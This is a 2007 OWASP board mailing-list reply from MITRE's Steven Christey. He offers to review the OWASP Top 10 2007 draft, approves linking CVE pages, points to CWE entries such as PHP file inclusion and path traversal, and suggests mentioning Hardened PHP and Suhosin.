[Owasp-board] Using CWE / CVE in OWASP Top 10 2007

Steven M. Christey coley at linus.mitre.org
Mon Jan 29 21:49:43 UTC 2007


Hi Andrew,

I am definitely interested in reviewing the full document.

Feel free to link to the CVE pages; the links you gave are proper.

Note that individual CWE nodes can also be referenced, if you would like
to do that.  For example, PHP File Inclusion (CWE-98) is here:

  http://cwe.mitre.org/data/definitions/98.html

And relative path traversal is CWE-23
(http://cwe.mitre.org/data/definitions/23.html)

Let me know if OWASP is interested in referencing the CWE's; I could help
with the mapping.  It would be a good exercise for CWE anyway, since I
suspect the attack-based nature of web app vulns might not mesh with CWE
perfectly.

The full CWE dictionary is at http://cwe.mitre.org/data/dictionary.html ,
or it could be downloaded.

FYI - for the PHP chapter you included, you might want to mention the
Hardened PHP project and Suhosin.  I also noticed a few typos.

- Steve


More information about the Owasp-board mailing list